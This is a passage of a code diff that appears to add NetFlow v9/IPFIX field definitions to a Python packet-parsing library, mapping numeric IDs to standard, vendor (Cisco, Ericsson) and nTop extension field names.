_N910F("rfc3550JitterMicroseconds"), + 387: _N910F("rfc3550JitterNanoseconds"), + 388: _N910F("dot1qDEI"), + 389: _N910F("dot1qCustomerDEI"), + 390: _N910F("flowSelectorAlgorithm"), + 391: _N910F("flowSelectedOctetDeltaCount"), + 392: _N910F("flowSelectedPacketDeltaCount"), + 393: _N910F("flowSelectedFlowDeltaCount"), + 394: _N910F("selectorIDTotalFlowsObserved"), + 395: _N910F("selectorIDTotalFlowsSelected"), + 396: _N910F("samplingFlowInterval"), + 397: _N910F("samplingFlowSpacing"), + 398: _N910F("flowSamplingTimeInterval"), + 399: _N910F("flowSamplingTimeSpacing"), + 400: _N910F("hashFlowDomain"), + 401: _N910F("transportOctetDeltaCount"), + 402: _N910F("transportPacketDeltaCount"), + 403: _N910F("originalExporterIPv4Address", length=4, + field=IPField), + 404: _N910F("originalExporterIPv6Address", length=16, + field=IP6Field), + 405: _N910F("originalObservationDomainId"), + 406: _N910F("intermediateProcessId"), + 407: _N910F("ignoredDataRecordTotalCount"), + 408: _N910F("dataLinkFrameType"), + 409: _N910F("sectionOffset"), + 410: _N910F("sectionExportedOctets"), + 411: _N910F("dot1qServiceInstanceTag"), + 412: _N910F("dot1qServiceInstanceId"), + 413: _N910F("dot1qServiceInstancePriority"), + 414: _N910F("dot1qCustomerSourceMacAddress", length=6, + field=MACField), + 415: _N910F("dot1qCustomerDestinationMacAddress", length=6, + field=MACField), + 416: _N910F("deprecated [dup of layer2OctetDeltaCount]"), + 417: _N910F("postLayer2OctetDeltaCount"), + 418: _N910F("postMCastLayer2OctetDeltaCount"), + 419: _N910F("deprecated [dup of layer2OctetTotalCount"), + 420: _N910F("postLayer2OctetTotalCount"), + 421: _N910F("postMCastLayer2OctetTotalCount"), + 422: _N910F("minimumLayer2TotalLength"), + 423: _N910F("maximumLayer2TotalLength"), + 424: _N910F("droppedLayer2OctetDeltaCount"), + 425: _N910F("droppedLayer2OctetTotalCount"), + 426: _N910F("ignoredLayer2OctetTotalCount"), + 427: _N910F("notSentLayer2OctetTotalCount"), + 428: _N910F("layer2OctetDeltaSumOfSquares"), + 429: _N910F("layer2OctetTotalSumOfSquares"), + 430: _N910F("layer2FrameDeltaCount"), + 431: _N910F("layer2FrameTotalCount"), + 432: _N910F("pseudoWireDestinationIPv4Address", length=4, + field=IPField), + 433: _N910F("ignoredLayer2FrameTotalCount"), + 434: _N910F("mibObjectValueInteger"), + 435: _N910F("mibObjectValueOctetString"), + 436: _N910F("mibObjectValueOID"), + 437: _N910F("mibObjectValueBits"), + 438: _N910F("mibObjectValueIPAddress"), + 439: _N910F("mibObjectValueCounter"), + 440: _N910F("mibObjectValueGauge"), + 441: _N910F("mibObjectValueTimeTicks"), + 442: _N910F("mibObjectValueUnsigned"), + 443: _N910F("mibObjectValueTable"), + 444: _N910F("mibObjectValueRow"), + 445: _N910F("mibObjectIdentifier"), + 446: _N910F("mibSubIdentifier"), + 447: _N910F("mibIndexIndicator"), + 448: _N910F("mibCaptureTimeSemantics"), + 449: _N910F("mibContextEngineID"), + 450: _N910F("mibContextName"), + 451: _N910F("mibObjectName"), + 452: _N910F("mibObjectDescription"), + 453: _N910F("mibObjectSyntax"), + 454: _N910F("mibModuleName"), + 455: _N910F("mobileIMSI"), + 456: _N910F("mobileMSISDN"), + 457: _N910F("httpStatusCode"), + 458: _N910F("sourceTransportPortsLimit"), + 459: _N910F("httpRequestMethod"), + 460: _N910F("httpRequestHost"), + 461: _N910F("httpRequestTarget"), + 462: _N910F("httpMessageVersion"), + 463: _N910F("natInstanceID"), + 464: _N910F("internalAddressRealm"), + 465: _N910F("externalAddressRealm"), + 466: _N910F("natQuotaExceededEvent"), + 467: _N910F("natThresholdEvent"), + 468: _N910F("httpUserAgent"), + 469: _N910F("httpContentType"), + 470: _N910F("httpReasonPhrase"), + 471: _N910F("maxSessionEntries"), + 472: _N910F("maxBIBEntries"), + 473: _N910F("maxEntriesPerUser"), + 474: _N910F("maxSubscribers"), + 475: _N910F("maxFragmentsPendingReassembly"), + 476: _N910F("addressPoolHighThreshold"), + 477: _N910F("addressPoolLowThreshold"), + 478: _N910F("addressPortMappingHighThreshold"), + 479: _N910F("addressPortMappingLowThreshold"), + 480: _N910F("addressPortMappingPerUserHighThreshold"), + 481: _N910F("globalAddressMappingHighThreshold"), + + # Ericsson NAT Logging + 24628: _N910F("NAT_LOG_FIELD_IDX_CONTEXT_ID"), + 24629: _N910F("NAT_LOG_FIELD_IDX_CONTEXT_NAME"), + 24630: _N910F("NAT_LOG_FIELD_IDX_ASSIGN_TS_SEC"), + 24631: _N910F("NAT_LOG_FIELD_IDX_UNASSIGN_TS_SEC"), + 24632: _N910F("NAT_LOG_FIELD_IDX_IPV4_INT_ADDR", length=4, + field=IPField), + 24633: _N910F("NAT_LOG_FIELD_IDX_IPV4_EXT_ADDR", length=4, + field=IPField), + 24634: _N910F("NAT_LOG_FIELD_IDX_EXT_PORT_FIRST"), + 24635: _N910F("NAT_LOG_FIELD_IDX_EXT_PORT_LAST"), + # Cisco ASA5500 Series NetFlow + 33000: _N910F("INGRESS_ACL_ID"), + 33001: _N910F("EGRESS_ACL_ID"), + 33002: _N910F("FW_EXT_EVENT"), + # Cisco TrustSec + 34000: _N910F("SGT_SOURCE_TAG"), + 34001: _N910F("SGT_DESTINATION_TAG"), + 34002: _N910F("SGT_SOURCE_NAME"), + 34003: _N910F("SGT_DESTINATION_NAME"), + # medianet performance monitor + 37000: _N910F("PACKETS_DROPPED"), + 37003: _N910F("BYTE_RATE"), + 37004: _N910F("APPLICATION_MEDIA_BYTES"), + 37006: _N910F("APPLICATION_MEDIA_BYTE_RATE"), + 37007: _N910F("APPLICATION_MEDIA_PACKETS"), + 37009: _N910F("APPLICATION_MEDIA_PACKET_RATE"), + 37011: _N910F("APPLICATION_MEDIA_EVENT"), + 37012: _N910F("MONITOR_EVENT"), + 37013: _N910F("TIMESTAMP_INTERVAL"), + 37014: _N910F("TRANSPORT_PACKETS_EXPECTED"), + 37016: _N910F("TRANSPORT_ROUND_TRIP_TIME"), + 37017: _N910F("TRANSPORT_EVENT_PACKET_LOSS"), + 37019: _N910F("TRANSPORT_PACKETS_LOST"), + 37021: _N910F("TRANSPORT_PACKETS_LOST_RATE"), + 37022: _N910F("TRANSPORT_RTP_SSRC"), + 37023: _N910F("TRANSPORT_RTP_JITTER_MEAN"), + 37024: _N910F("TRANSPORT_RTP_JITTER_MIN"), + 37025: _N910F("TRANSPORT_RTP_JITTER_MAX"), + 37041: _N910F("TRANSPORT_RTP_PAYLOAD_TYPE"), + 37071: _N910F("TRANSPORT_BYTES_OUT_OF_ORDER"), + 37074: _N910F("TRANSPORT_PACKETS_OUT_OF_ORDER"), + 37083: _N910F("TRANSPORT_TCP_WINDOWS_SIZE_MIN"), + 37084: _N910F("TRANSPORT_TCP_WINDOWS_SIZE_MAX"), + 37085: _N910F("TRANSPORT_TCP_WINDOWS_SIZE_MEAN"), + 37086: _N910F("TRANSPORT_TCP_MAXIMUM_SEGMENT_SIZE"), + # Cisco ASA 5500 + 40000: _N910F("AAA_USERNAME"), + 40001: _N910F("XLATE_SRC_ADDR_IPV4", length=4, + field=IPField), + 40002: _N910F("XLATE_DST_ADDR_IPV4", length=4, + field=IPField), + 40003: _N910F("XLATE_SRC_PORT"), + 40004: _N910F("XLATE_DST_PORT"), + 40005: _N910F("FW_EVENT"), + # v9 nTop extensions + 80 + NTOP_BASE: _N910F("SRC_FRAGMENTS"), + 81 + NTOP_BASE: _N910F("DST_FRAGMENTS"), + 82 + NTOP_BASE: _N910F("SRC_TO_DST_MAX_THROUGHPUT"), + 83 + NTOP_BASE: _N910F("SRC_TO_DST_MIN_THROUGHPUT"), + 84 + NTOP_BASE: _N910F("SRC_TO_DST_AVG_THROUGHPUT"), + 85 + NTOP_BASE: _N910F("SRC_TO_SRC_MAX_THROUGHPUT"), + 86 + NTOP_BASE: _N910F("SRC_TO_SRC_MIN_THROUGHPUT"), + 87 + NTOP_BASE: _N910F("SRC_TO_SRC_AVG_THROUGHPUT"), + 88 + NTOP_BASE: _N910F("NUM_PKTS_UP_TO_128_BYTES"), + 89 + NTOP_BASE: _N910F("NUM_PKTS_128_TO_256_BYTES"), + 90 + NTOP_BASE: _N910F("NUM_PKTS_256_TO_512_BYTES"), + 91 + NTOP_BASE: _N910F("NUM_PKTS_512_TO_1024_BYTES"), + 92 + NTOP_BASE: _N910F("NUM_PKTS_1024_TO_1514_BYTES"), + 93 + NTOP_BASE: _N910F("NUM_PKTS_OVER_1514_BYTES"), + 98 + NTOP_BASE: _N910F("CUMULATIVE_ICMP_TYPE"), + 101 + NTOP_BASE: _N910F("SRC_IP_COUNTRY"), + 102 + NTOP_BASE: _N910F("SRC_IP_CITY"), + 103 + NTOP_BASE: _N910F("DST_IP_COUNTRY"), + 104 + NTOP_BASE: _N910F("DST_IP_CITY"), + 105 + NTOP_BASE: _N910F("FLOW_PROTO_PORT"), + 106 + NTOP_BASE: _N910F("UPSTREAM_TUNNEL_ID"), + 107 + NTOP_BASE: _N910F("LONGEST_FLOW_PKT"), + 108 + NTOP_BASE: _N910F("SHORTEST_FLOW_PKT"), + 109 + NTOP_BASE: _N910F("RETRANSMITTED_IN_PKTS"), + 110 + NTOP_BASE: _N910F("RETRANSMITTED_OUT_PKTS"), + 111 + NTOP_BASE: _N910F("OOORDER_IN_PKTS"), + 112 + NTOP_BASE: _N910F("OOORDER_OUT_PKTS"), + 113 + NTOP_BASE: _N910F("UNTUNNELED_PROTOCOL"), + 114 + NTOP_BASE: _N910F("UNTUNNELED_IPV4_SRC_ADDR", length=4, + field=IPField), + 115 + NTOP_BASE: _N910F("UNTUNNELED_L4_SRC_PORT"), + 116 + NTOP_BASE: _N910F("UNTUNNELED_IPV4_DST_ADDR", length=4, + field=IPField), + 117 + NTOP_BASE: _N910F("UNTUNNELED_L4_DST_PORT"), + 118 + NTOP_BASE: _N910F("L7_PROTO"), + 119 + NTOP_BASE: _N910F("L7_PROTO_NAME"), + 120 + NTOP_BASE: _N910F("DOWNSTREAM_TUNNEL_ID"), + 121 + NTOP_BASE: _N910F("FLOW_USER_NAME"), + 122 + NTOP_BASE: _N910F("FLOW_SERVER_NAME"), + 123 + NTOP_BASE: _N910F("CLIENT_NW_LATENCY_MS"), + 124 + NTOP_BASE: _N910F("SERVER_NW_LATENCY_MS"), + 125 + NTOP_BASE: _N910F("APPL_LATENCY_MS"), + 126 + NTOP_BASE: _N910F("PLUGIN_NAME"), + 127 + NTOP_BASE: _N910F("RETRANSMITTED_IN_BYTES"), + 128 + NTOP_BASE: _N910F("RETRANSMITTED_OUT_BYTES"), + 130 + NTOP_BASE: _N910F("SIP_CALL_ID"), + 131 + NTOP_BASE: _N910F("SIP_CALLING_PARTY"), + 132 + NTOP_BASE: _N910F("SIP_CALLED_PARTY"), + 133 + NTOP_BASE: _N910F("SIP_RTP_CODECS"), + 134 + NTOP_BASE: _N910F("SIP_INVITE_TIME"), + 135 + NTOP_BASE: _N910F("SIP_TRYING_TIME"), + 136 + NTOP_BASE: _N910F("SIP_RINGING_TIME"), + 137 + NTOP_BASE: _N910F("SIP_INVITE_OK_TIME"), + 138 + NTOP_BASE: _N910F("SIP_INVITE_FAILURE_TIME"), + 139 + NTOP_BASE: _N910F("SIP_BYE_TIME"), + 140 + NTOP_BASE: _N910F("SIP_BYE_OK_TIME"), + 141 + NTOP_BASE: _N910F("SIP_CANCEL_TIME"), + 142 + NTOP_BASE: _N910F("SIP_CANCEL_OK_TIME"), + 143 + NTOP_BASE: _N910F("SIP_RTP_IPV4_SRC_ADDR", length=4, + field=IPField), + 144 + NTOP_BASE: _N910F("SIP_RTP_L4_SRC_PORT"), + 145 + NTOP_BASE: _N910F("SIP_RTP_IPV4_DST_ADDR", length=4, + field=IPField), + 146 + NTOP_BASE: _N910F("SIP_RTP_L4_DST_PORT"), + 147 + NTOP_BASE: _N910F("SIP_RESPONSE_CODE"), + 148 + NTOP_BASE: _N910F("SIP_REASON_CAUSE"), + 150 + NTOP_BASE: _N910F("RTP_FIRST_SEQ"), + 151 + NTOP_BASE: _N910F("RTP_FIRST_TS"), + 152 + NTOP_BASE: _N910F("RTP_LAST_SEQ"), + 153 + NTOP_BASE: _N910F("RTP_LAST_TS"), + 154 + NTOP_BASE: _N910F("RTP_IN_JITTER"), + 155 + NTOP_BASE: _N910F("RTP_OUT_JITTER"), + 156 + NTOP_BASE: _N910F("RTP_IN_PKT_LOST"), + 157 + NTOP_BASE: _N910F("RTP_OUT_PKT_LOST"), + 158 + NTOP_BASE: _N910F("RTP_OUT_PAYLOAD_TYPE"), + 159 + NTOP_BASE: _N910F("RTP_IN_MAX_DELTA"), + 160 + NTOP_BASE: _N910F("RTP_OUT_MAX_DELTA"), + 161 + NTOP_BASE: _N910F("RTP_IN_PAYLOAD_TYPE"), + 168 + NTOP_BASE: _N910F("SRC_PROC_PID"), + 169 + NTOP_BASE: _N910F("SRC_PROC_NAME"), + 180 + NTOP_BASE: _N910F("HTTP_URL"), + 181 + NTOP_BASE: _N910F("HTTP_RET_CODE"), + 182 + NTOP_BASE: _N910F("HTTP_REFERER"), + 183 + NTOP_BASE: _N910F("HTTP_UA"), + 184 + NTOP_BASE: _N910F("HTTP_MIME"), + 185 + NTOP_BASE: _N910F("SMTP_MAIL_FROM"), + 186 + NTOP_BASE: _N910F("SMTP_RCPT_TO"), + 187 + NTOP_BASE: _N910F("HTTP_HOST"), + 188 + NTOP_BASE: _N910F("SSL_SERVER_NAME"), + 189 + NTOP_BASE: _N910F("BITTORRENT_HASH"), + 195 + NTOP_BASE: _N910F("MYSQL_SRV_VERSION"), + 196 + NTOP_BASE: _N910F("MYSQL_USERNAME"), + 197 + NTOP_BASE: _N910F("MYSQL_DB"), + 198 + NTOP_BASE: _N910F("MYSQL_QUERY"), + 199 + NTOP_BASE: _N910F("MYSQL_RESPONSE"), + 200 + NTOP_BASE: _N910F("ORACLE_USERNAME"), + 201 + NTOP_BASE: _N910F("ORACLE_QUERY"), + 202 + NTOP_BASE: _N910F("ORACLE_RSP_CODE"), + 203 + NTOP_BASE: _N910F("ORACLE_RSP_STRING"), + 204 + NTOP_BASE: _N910F("ORACLE_QUERY_DURATION"), + 205 + NTOP_BASE: _N910F("DNS_QUERY"), + 206 + NTOP_BASE: _N910F("DNS_QUERY_ID"), + 207 + NTOP_BASE: _N910F("DNS_QUERY_TYPE"), + 208 + NTOP_BASE: _N910F("DNS_RET_CODE"), + 209 + NTOP_BASE: _N910F("DNS_NUM_ANSWERS"), + 210 + NTOP_BASE: _N910F("POP_USER"), + 220 + NTOP_BASE: _N910F("GTPV1_REQ_MSG_TYPE"), + 221 + NTOP_BASE: _N910F("GTPV1_RSP_MSG_TYPE"), + 222 + NTOP_BASE: _N910F("GTPV1_C2S_TEID_DATA"), + 223 + NTOP_BASE: _N910F("GTPV1_C2S_TEID_CTRL"), + 224 + NTOP_BASE: _N910F("GTPV1_S2C_TEID_DATA"), + 225 + NTOP_BASE: _N910F("GTPV1_S2C_TEID_CTRL"), + 226 + NTOP_BASE: _N910F("GTPV1_END_USER_IP"), + 227 + NTOP_BASE: _N910F("GTPV1_END_USER_IMSI"), + 228 + NTOP_BASE: _N910F("GTPV1_END_USER_MSISDN"), + 229 + NTOP_BASE: _N910F("GTPV1_END_USER_IMEI"), + 230 + NTOP_BASE: _N910F("GTPV1_APN_NAME"), + 231 + NTOP_BASE: _N910F("GTPV1_RAI_MCC"), + 232 + NTOP_BASE: _N910F("GTPV1_RAI_MNC"), + 233 + NTOP_BASE: _N910F("GTPV1_ULI_CELL_LAC"), + 234 + NTOP_BASE: _N910F("GTPV1_ULI_CELL_CI"), + 235 + NTOP_BASE: _N910F("GTPV1_ULI_SAC"), + 236 + NTOP_BASE: _N910F("GTPV1_RAT_TYPE"), + 240 + NTOP_BASE: _N910F("RADIUS_REQ_MSG_TYPE"), + 241 + NTOP_BASE: _N910F("RADIUS_RSP_MSG_TYPE"), + 242 + NTOP_BASE: _N910F("RADIUS_USER_NAME"), + 243 + NTOP_BASE: _N910F("RADIUS_CALLING_STATION_ID"), + 244 + NTOP_BASE: _N910F("RADIUS_CALLED_STATION_ID"), + 245 + NTOP_BASE: _N910F("RADIUS_NAS_IP_ADDR"), + 246 + NTOP_BASE: _N910F("RADIUS_NAS_IDENTIFIER"), + 247 + NTOP_BASE: _N910F("RADIUS_USER_IMSI"), + 248 + NTOP_BASE: _N910F("RADIUS_USER_IMEI"), + 249 + NTOP_BASE: _N910F("RADIUS_FRAMED_IP_ADDR"), + 250 + NTOP_BASE: _N910F("RADIUS_ACCT_SESSION_ID"), + 251 + NTOP_BASE: _N910F("RADIUS_ACCT_STATUS_TYPE"), + 252 + NTOP_BASE: _N910F("RADIUS_ACCT_IN_OCTETS"), + 253 + NTOP_BASE: _N910F("RADIUS_ACCT_OUT_OCTETS"), + 254 + NTOP_BASE: _N910F("RADIUS_ACCT_IN_PKTS"), + 255 + NTOP_BASE: _N910F("RADIUS_ACCT_OUT_PKTS"), + 260 + NTOP_BASE: _N910F("IMAP_LOGIN"), + 270 + NTOP_BASE: _N910F("GTPV2_REQ_MSG_TYPE"), + 271 + NTOP_BASE: _N910F("GTPV2_RSP_MSG_TYPE"), + 272 + NTOP_BASE: _N910F("GTPV2_C2S_S1U_GTPU_TEID"), + 273 + NTOP_BASE: _N910F("GTPV2_C2S_S1U_GTPU_IP"), + 274 + NTOP_BASE: _N910F("GTPV2_S2C_S1U_GTPU_TEID"), + 275 + NTOP_BASE: _N910F("GTPV2_S2C_S1U_GTPU_IP"), + 276 + NTOP_BASE: _N910F("GTPV2_END_USER_IMSI"), + 277 + NTOP_BASE: _N910F("GTPV2_END_USER_MSISDN"), + 278 + NTOP_BASE: _N910F("GTPV2_APN_NAME"), + 279 + NTOP_BASE: _N910F("GTPV2_ULI_MCC"), + 280 + NTOP_BASE: _N910F("GTPV2_ULI_MNC"), + 281 + NTOP_BASE: _N910F("GTPV2_ULI_CELL_TAC"), + 282 + NTOP_BASE: _N910F("GTPV2_ULI_CELL_ID"), + 283 + NTOP_BASE: _N910F("GTPV2_RAT_TYPE"), + 284 + NTOP_BASE: _N910F("GTPV2_PDN_IP"), + 285 + NTOP_BASE: _N910F("GTPV2_END_USER_IMEI"), + 290 + NTOP_BASE: _N910F("SRC_AS_PATH_1"), + 291 + NTOP_BASE: _N910F("SRC_AS_PATH_2"), + 292 + NTOP_BASE: _N910F("SRC_AS_PATH_3"), + 293 + NTOP_BASE: _N910F("SRC_AS_PATH_4"), + 294 + NTOP_BASE: _N910F("SRC_AS_PATH_5"), + 295 + NTOP_BASE: _N910F("SRC_AS_PATH_6"), + 296 + NTOP_BASE: _N910F("SRC_AS_PATH_7"), + 297 + NTOP_BASE: _N910F("SRC_AS_PATH_8"), + 298 + NTOP_BASE: _N910F("SRC_AS_PATH_9"), + 299 + NTOP_BASE: _N910F("SRC_AS_PATH_10"), + 300 + NTOP_BASE: _N910F("DST_AS_PATH_1"), + 301 + NTOP_BASE: _N910F("DST_AS_PATH_2"), + 302 + NTOP_BASE: _N910F("DST_AS_PATH_3"), + 303 + NTOP_BASE: _N910F("DST_AS_PATH_4"), + 304 + NTOP_BASE: _N910F("DST_AS_PATH_5"), + 305 + NTOP_BASE: _N910F("DST_AS_PATH_6"), + 306 + NTOP_BASE: _N910F("DST_AS_PATH_7"), + 307 + NTOP_BASE: _N910F("DST_AS_PATH_8"), + 308 + NTOP_BASE: _N910F("DST_AS_PATH_9"), + 309 + NTOP_BASE: _N910F("DST_AS_PATH_10"), + 320 + NTOP_BASE: _N910F("MYSQL_APPL_LATENCY_USEC"), + 321 + NTOP_BASE: _N910F("GTPV0_REQ_MSG_TYPE"), + 322 + NTOP_BASE: _N910F("GTPV0_RSP_MSG_TYPE"), + 323 + NTOP_BASE: _N910F("GTPV0_TID"), + 324 + NTOP_BASE: _N910F("GTPV0_END_USER_IP"), + 325 + NTOP_BASE: _N910F("GTPV0_END_USER_MSISDN"), + 326 + NTOP_BASE: _N910F("GTPV0_APN_NAME"), + 327 + NTOP_BASE: _N910F("GTPV0_RAI_MCC"), + 328 + NTOP_BASE: _N910F("GTPV0_RAI_MNC"), + 329 + NTOP_BASE: _N910F("GTPV0_RAI_CELL_LAC"), + 330 + NTOP_BASE: _N910F("GTPV0_RAI_CELL_RAC"), + 331 + NTOP_BASE: _N910F("GTPV0_RESPONSE_CAUSE"), + 332 + NTOP_BASE: _N910F("GTPV1_RESPONSE_CAUSE"), + 333 + NTOP_BASE: _N910F("GTPV2_RESPONSE_CAUSE"), + 334 + NTOP_BASE: _N910F("NUM_PKTS_TTL_5_32"), + 335 + NTOP_BASE: _N910F("NUM_PKTS_TTL_32_64"), + 336 + NTOP_BASE: _N910F("NUM_PKTS_TTL_64_96"), + 337 + NTOP_BASE: _N910F("NUM_PKTS_TTL_96_128"), + 338 + NTOP_BASE: _N910F("NUM_PKTS_TTL_128_160"), + 339 + NTOP_BASE: _N910F("NUM_PKTS_TTL_160_192"), + 340 + NTOP_BASE: _N910F("NUM_PKTS_TTL_192_224"), + 341 + NTOP_BASE: _N910F("NUM_PKTS_TTL_224_255"), + 342 + NTOP_BASE: _N910F("GTPV1_RAI_LAC"), + 343 + NTOP_BASE: _N910F("GTPV1_RAI_RAC"), + 344 + NTOP_BASE: _N910F("GTPV1_ULI_MCC"), + 345 + NTOP_BASE: _N910F("GTPV1_ULI_MNC"), + 346 + NTOP_BASE: _N910F("NUM_PKTS_TTL_2_5"), + 347 + NTOP_BASE: _N910F("NUM_PKTS_TTL_EQ_1"), + 348 + NTOP_BASE: _N910F("RTP_SIP_CALL_ID"), + 349 + NTOP_BASE: _N910F("IN_SRC_OSI_SAP"), + 350 + NTOP_BASE: _N910F("OUT_DST_OSI_SAP"), + 351 + NTOP_BASE: _N910F("WHOIS_DAS_DOMAIN"), + 352 + NTOP_BASE: _N910F("DNS_TTL_ANSWER"), + 353 + NTOP_BASE: _N910F("DHCP_CLIENT_MAC", length=6, + field=MACField), + 354 + NTOP_BASE: _N910F("DHCP_CLIENT_IP", length=4, + field=IPField), + 355 + NTOP_BASE: _N910F("DHCP_CLIENT_NAME"), + 356 + NTOP_BASE: _N910F("FTP_LOGIN"), + 357 + NTOP_BASE: _N910F("FTP_PASSWORD"), + 358 + NTOP_BASE: _N910F("FTP_COMMAND"), + 359 + NTOP_BASE: _N910F("FTP_COMMAND_RET_CODE"), + 360 + NTOP_BASE: _N910F("HTTP_METHOD"), + 361 + NTOP_BASE: _N910F("HTTP_SITE"), + 362 + NTOP_BASE: _N910F("SIP_C_IP"), + 363 + NTOP_BASE: _N910F("SIP_CALL_STATE"), + 364 + NTOP_BASE: _N910F("EPP_REGISTRAR_NAME"), + 365 + NTOP_BASE: _N910F("EPP_CMD"), + 366 + NTOP_BASE: _N910F("EPP_CMD_ARGS"), + 367 + NTOP_BASE: _N910F("EPP_RSP_CODE"), + 368 + NTOP_BASE: _N910F("EPP_REASON_STR"), + 369 + NTOP_BASE: _N910F("EPP_SERVER_NAME"), + 370 + NTOP_BASE: _N910F("RTP_IN_MOS"), + 371 + NTOP_BASE: _N910F("RTP_IN_R_FACTOR"), + 372 + NTOP_BASE: _N910F("SRC_PROC_USER_NAME"), + 373 + NTOP_BASE: _N910F("SRC_FATHER_PROC_PID"), + 374 + NTOP_BASE: _N910F("SRC_FATHER_PROC_NAME"), + 375 + NTOP_BASE: _N910F("DST_PROC_PID"), + 376 + NTOP_BASE: _N910F("DST_PROC_NAME"), + 377 + NTOP_BASE: _N910F("DST_PROC_USER_NAME"), + 378 + NTOP_BASE: _N910F("DST_FATHER_PROC_PID"), + 379 + NTOP_BASE: _N910F("DST_FATHER_PROC_NAME"), + 380 + NTOP_BASE: _N910F("RTP_RTT"), + 381 + NTOP_BASE: _N910F("RTP_IN_TRANSIT"), + 382 + NTOP_BASE: _N910F("RTP_OUT_TRANSIT"), + 383 + NTOP_BASE: _N910F("SRC_PROC_ACTUAL_MEMORY"), + 384 + NTOP_BASE: _N910F("SRC_PROC_PEAK_MEMORY"), + 385 + NTOP_BASE: _N910F("SRC_PROC_AVERAGE_CPU_LOAD"), + 386 + NTOP_BASE: _N910F("SRC_PROC_NUM_PAGE_FAULTS"), + 387 + NTOP_BASE: _N910F("DST_PROC_ACTUAL_MEMORY"), + 388 + NTOP_BASE: _N910F("DST_PROC_PEAK_MEMORY"), + 389 + NTOP_BASE: _N910F("DST_PROC_AVERAGE_CPU_LOAD"), + 390 + NTOP_BASE: _N910F("DST_PROC_NUM_PAGE_FAULTS"), + 391 + NTOP_BASE: _N910F("DURATION_IN"), + 392 + NTOP_BASE: _N910F("DURATION_OUT"), + 393 + NTOP_BASE: _N910F("SRC_PROC_PCTG_IOWAIT"), + 394 + NTOP_BASE: _N910F("DST_PROC_PCTG_IOWAIT"), + 395 + NTOP_BASE: _N910F("RTP_DTMF_TONES"), + 396 + NTOP_BASE: _N910F("UNTUNNELED_IPV6_SRC_ADDR", length=16, + field=IP6Field), + 397 + NTOP_BASE: _N910F("UNTUNNELED_IPV6_DST_ADDR", length=16, + field=IP6Field), + 398 + NTOP_BASE: _N910F("DNS_RESPONSE"), + 399 + NTOP_BASE: _N910F("DIAMETER_REQ_MSG_TYPE"), + 400 + NTOP_BASE: _N910F("DIAMETER_RSP_MSG_TYPE"), + 401 + NTOP_BASE: _N910F("DIAMETER_REQ_ORIGIN_HOST"), + 402 + NTOP_BASE: _N910F("DIAMETER_RSP_ORIGIN_HOST"), + 403 + NTOP_BASE: _N910F("DIAMETER_REQ_USER_NAME"), + 404 + NTOP_BASE: _N910F("DIAMETER_RSP_RESULT_CODE"), + 405 + NTOP_BASE: _N910F("DIAMETER_EXP_RES_VENDOR_ID"), + 406 + NTOP_BASE: _N910F("DIAMETER_EXP_RES_RESULT_CODE"), + 407 + NTOP_BASE: _N910F("S1AP_ENB_UE_S1AP_ID"), + 408 + NTOP_BASE: _N910F("S1AP_MME_UE_S1AP_ID"), + 409 + NTOP_BASE: _N910F("S1AP_MSG_EMM_TYPE_MME_TO_ENB"), + 410 + NTOP_BASE: _N910F("S1AP_MSG_ESM_TYPE_MME_TO_ENB"), + 411 + NTOP_BASE: _N910F("S1AP_MSG_EMM_TYPE_ENB_TO_MME"), + 412 + NTOP_BASE: _N910F("S1AP_MSG_ESM_TYPE_ENB_TO_MME"), + 413 + NTOP_BASE: _N910F("S1AP_CAUSE_ENB_TO_MME"), + 414 + NTOP_BASE: _N910F("S1AP_DETAILED_CAUSE_ENB_TO_MME"), + 415 + NTOP_BASE: _N910F("TCP_WIN_MIN_IN"), + 416 + NTOP_BASE: _N910F("TCP_WIN_MAX_IN"), + 417 + NTOP_BASE: _N910F("TCP_WIN_MSS_IN"), + 418 + NTOP_BASE: _N910F("TCP_WIN_SCALE_IN"), + 419 + NTOP_BASE: _N910F("TCP_WIN_MIN_OUT"), + 420 + NTOP_BASE: _N910F("TCP_WIN_MAX_OUT"), + 421 + NTOP_BASE: _N910F("TCP_WIN_MSS_OUT"), + 422 + NTOP_BASE: _N910F("TCP_WIN_SCALE_OUT"), + 423 + NTOP_BASE: _N910F("DHCP_REMOTE_ID"), + 424 + NTOP_BASE: _N910F("DHCP_SUBSCRIBER_ID"), + 425 + NTOP_BASE: _N910F("SRC_PROC_UID"), + 426 + NTOP_BASE: _N910F("DST_PROC_UID"), + 427 + NTOP_BASE: _N910F("APPLICATION_NAME"), + 428 + NTOP_BASE: _N910F("USER_NAME"), + 429 + NTOP_BASE: _N910F("DHCP_MESSAGE_TYPE"), + 430 + NTOP_BASE: _N910F("RTP_IN_PKT_DROP"), + 431 + NTOP_BASE: _N910F("RTP_OUT_PKT_DROP"), + 432 + NTOP_BASE: _N910F("RTP_OUT_MOS"), + 433 + NTOP_BASE: _N910F("RTP_OUT_R_FACTOR"), + 434 + NTOP_BASE: _N910F("RTP_MOS"), + 435 + NTOP_BASE: _N910F("GTPV2_S5_S8_GTPC_TEID"), + 436 + NTOP_BASE: _N910F("RTP_R_FACTOR"), + 437 + NTOP_BASE: _N910F("RTP_SSRC"), + 438 + NTOP_BASE: _N910F("PAYLOAD_HASH"), + 439 + NTOP_BASE: _N910F("GTPV2_C2S_S5_S8_GTPU_TEID"), + 440 + NTOP_BASE: _N910F("GTPV2_S2C_S5_S8_GTPU_TEID"), + 441 + NTOP_BASE: _N910F("GTPV2_C2S_S5_S8_GTPU_IP"), + 442 + NTOP_BASE: _N910F("GTPV2_S2C_S5_S8_GTPU_IP"), + 443 + NTOP_BASE: _N910F("SRC_AS_MAP"), + 444 + NTOP_BASE: _N910F("DST_AS_MAP"), + 445 + NTOP_BASE: _N910F("DIAMETER_HOP_BY_HOP_ID"), + 446 + NTOP_BASE: _N910F("UPSTREAM_SESSION_ID"), + 447 + NTOP_BASE: _N910F("DOWNSTREAM_SESSION_ID"), + 448 + NTOP_BASE: _N910F("SRC_IP_LONG"), + 449 + NTOP_BASE: _N910F("SRC_IP_LAT"), + 450 + NTOP_BASE: _N910F("DST_IP_LONG"), + 451 + NTOP_BASE: _N910F("DST_IP_LAT"), + 452 + NTOP_BASE: _N910F("DIAMETER_CLR_CANCEL_TYPE"), + 453 + NTOP_BASE: _N910F("DIAMETER_CLR_FLAGS"), + 454 + NTOP_BASE: _N910F("GTPV2_C2S_S5_S8_GTPC_IP"), + 455 + NTOP_BASE: _N910F("GTPV2_S2C_S5_S8_GTPC_IP"), + 456 + NTOP_BASE: _N910F("GTPV2_C2S_S5_S8_SGW_GTPU_TEID"), + 457 + NTOP_BASE: _N910F("GTPV2_S2C_S5_S8_SGW_GTPU_TEID"), + 458 + NTOP_BASE: 